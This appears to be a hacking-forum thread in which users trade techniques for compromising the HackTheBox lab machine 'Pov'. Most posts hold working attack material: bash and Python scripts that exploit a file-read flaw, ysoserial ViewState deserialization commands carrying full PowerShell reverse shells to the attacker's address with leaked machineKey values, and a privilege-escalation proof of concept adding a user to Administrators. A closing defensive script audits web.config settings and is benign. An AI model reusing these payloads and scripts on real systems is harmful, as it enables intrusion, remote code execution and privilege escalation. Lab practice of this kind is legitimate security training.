Pov - HTB
by paven - Saturday January 27, 2024 at 04:17 PM
#91
(Jan 28, 2024, 09:09 AM)eclipse Wrote:
(Jan 28, 2024, 09:06 AM)wardensec Wrote:
(Jan 28, 2024, 08:51 AM)eclipse Wrote: How do I make use of SeDebugPrivilegePoC.exe?

I changed CreateProcess's CmdLine to @"C:\Users\alaading\Downloads\rshell.exe", a Windows reverse shell created by msfvenom.

but:

[*]Sending stage (200774 bytes) to 10.10.11.251
[*]10.10.11.251 - Meterpreter session 9 closed.  Reason: Died
[-] Meterpreter session 9 is not valid and will be closed

Any hint ???

Just add the user to the Administrators group. How did you compile the PoC?

status = CreateProcess(
    null,
    @"C:\Windows\System32\cmd.exe /c net localgroup administrators alaading /add",
    IntPtr.Zero,
    IntPtr.Zero,
    false,
    ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | ProcessCreationFlags.CREATE_NEW_CONSOLE,
    IntPtr.Zero,
    Environment.CurrentDirectory,
    ref si,
    out PROCESS_INFORMATION pi);

And ctrl+shift+B to compile it in VS.

Weird, it's giving me an error saying there needs to be a ')' and ';' after "out PROCESS_INFORMATION pi", but it has both, just like yours.
Reply
#92
(Jan 28, 2024, 04:18 AM)Cmbrlnd Wrote:
(Jan 28, 2024, 12:31 AM)Art10n Wrote: I am stuck on the ysoserial exe; I don't know how to run it in ParrotOS.

Me too hahaha, can't get it working in Linux

Finally, I used Windows ... but I had to disable the AV
Reply
#93
After I delivered the runas exe to the machine it's not working. Can anyone suggest why?
Reply
#94
(Jan 28, 2024, 10:33 AM)U2t5d2lu Wrote: After I delivered the runas exe to the machine it's not working. Can anyone suggest why?

With RunasCs.exe I got credentials and am trying to get a shell as alaading.

I just noticed someone else uploaded another RunasCs.exe which works, and mine is not working for some reason.
Reply
#95
RunasCsException: CreateProcessWithLogonW logon type 2
when trying to get a reverse shell with runascs.exe. How can I get a reverse shell as the other user?
Reply
#96
(Jan 28, 2024, 01:47 AM)scizko1 Wrote: I'm also stuck with the payload...

.\ysoserial.exe --generator="8E0F0FA3"  -p ViewState -g TextFormattingRunProperties -c "New-Object System.Net.Sockets.TCPClient('10.10.x.x',9998);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

Is anyone able to help me on this one? What is wrong here? Confused
Reply
#97
Seems like I'm so late to the party, but I'm here.
Reply
#98
(Jan 27, 2024, 08:41 PM)DataNinja Wrote: to automate the lfi

#!/bin/bash

# Sends the download postback with a chosen file path and prints the response.
lfi() {
    local path="$1"
    local url="http://dev.pov.htb/portfolio/"

    local data="__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=oZdOFgVMnMUK%2FYsKb5EIbu8K5FHpcUxxiZo4DRwjqKXyaBZlr5C2B1qTDis2i3ay5jRdEkHIpxK%2FDtizrUyeFYsgG2I%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=q9%2BtrU8Llel1HIV8dNCMQjWweRAVxWvJLVMAhov2wealiJz5v86vse9faPve%2B2Ujm%2BGxnHiSCVy56Gzrmw%2BEzjrEGa%2BQ6qlezJahDpD%2BDppQ%2BivmcgEiaonMs2JLzDyETmEABw%3D%3D&file=$path"
    #echo -e $data
    if response=$(curl -s -k -X POST --data-binary "$data" "$url"); then
        if [ "$(echo "$response" | grep -c "Error 404: Not Found")" -eq 0 ]; then
            echo -e "\e[32m$response\e[0m"
        else
            echo -e "\e[31m$path not found.\e[0m"
        fi
    else
        # curl itself failed; re-send the same body and report only the HTTP status code
        echo -e "\e[31mLFI Error : $(curl -s -k -X POST --data-binary "$data" "$url" -o /dev/null -w '%{http_code}')\e[0m"
    fi
}

main() {
    while true; do
        read -r -p $'\e[34m[+] file >> \e[0m' path
        lfi "$path"
    done
}

if [ "${BASH_SOURCE[0]}" == "${0}" ]; then
    main
fi

With a Python script:
import requests

headers = {"Content-Type": "application/x-www-form-urlencoded", "Accept": "*/*"}

def lfi_exploit(file_name):
    data = f"__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=pysPH3epTp1d3dPCs3yCdepk7nN6lZ7LEKVBjC4xY6xP774yBT8JLxXqt7gsi0tteP9iyC2BTidHx0bAXqvDY4KCIq8%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=1ZkrStfRtU5JGGv7t3tyirX6UVwHb6NuihItoMCodMNGABU3Xq4%2F58Zp%2BhWVWl%2F3esCjt1LZq5rglp164aTEcUwCmPDm8DInXc0OoeScUyKrnEh9eFLmvKtTtYhQBLEddzn9eA%3D%3D&file={file_name}"
    req = requests.post('http://dev.pov.htb/portfolio/', headers=headers, data=data)
    if req.status_code == 200:
        print(req.text)
    else:
        print("Nothing Returned")

if __name__ == '__main__':
    while True:
        file = input("Enter File To Read : ")
        lfi_exploit(file)
Reply
#99
Thanks for the hints! Ended up getting root after your reply
Reply
nope, still not working, tried absolutely everything, it's just some god out there that simply refuse to let me pwn this, I tried absolutely everything and I made sure it was right, character by character, new vms, other encodings, other versions of ysoserial, other payloads, other revshells, bought a writeup, it's just simply refusing and that's it, and this fucked up machine has only port 80 open so I can't somehow skip this shit, I'm just done man

------------------------------------------------------------------------------------

Just start a nc listener (nc -lvnp 9000).
Use this command to generate the payload: ./ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c \"\$client = New-Object System.Net.Sockets.TCPClient('Your_address_here', 9000); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2  = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"


And now copy the payload, do the Burp Suite request for the download CV, and paste the payload into the "__VIEWSTATE=" field. Forward the request and you will get a reverse shell.

Reply
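The ysoserial commands in this thread only work because the application's machineKey (AES decryptionKey and SHA1 validationKey) was readable, so a forged ViewState passes MAC validation. As an added defender-side example (not code from the thread), the script below audits a constructed web.config for the conditions that enable that attack: static keys in the file, a weak validation algorithm, and a disabled ViewState MAC. The sample configs are made up for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample: static keys and SHA1 validation, like the setup the thread exploits.
WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey decryption="AES" decryptionKey="0000000000000000000000000000000000000000"
                validation="SHA1" validationKey="1111111111111111111111111111111111111111" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

# Constructed sample of a corrected configuration.
HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey decryption="AES" decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" validationKey="AutoGenerate,IsolateApps" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>
"""

STRONG_VALIDATION = {"HMACSHA256", "HMACSHA384", "HMACSHA512"}


def audit_machine_key(config_xml: str) -> list[str]:
    """Return a list of findings; an empty list means no issue was detected."""
    findings = []
    root = ET.fromstring(config_xml)
    mk = root.find("./system.web/machineKey")
    pages = root.find("./system.web/pages")
    if mk is not None:
        val_alg = mk.get("validation", "HMACSHA256").upper()  # ASP.NET 4.5+ default
        if val_alg not in STRONG_VALIDATION:
            findings.append(f"weak validation algorithm {val_alg}; use HMACSHA256 or stronger")
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate")
            if not value.upper().startswith("AUTOGENERATE"):
                # A literal key is exactly what a file-read bug hands to an attacker;
                # if a fixed key is required (web farm), keep it out of readable files and rotate it.
                findings.append(f"{attr} is a static literal; readable config => forgeable ViewState")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: ViewState is not signed at all")
    return findings
```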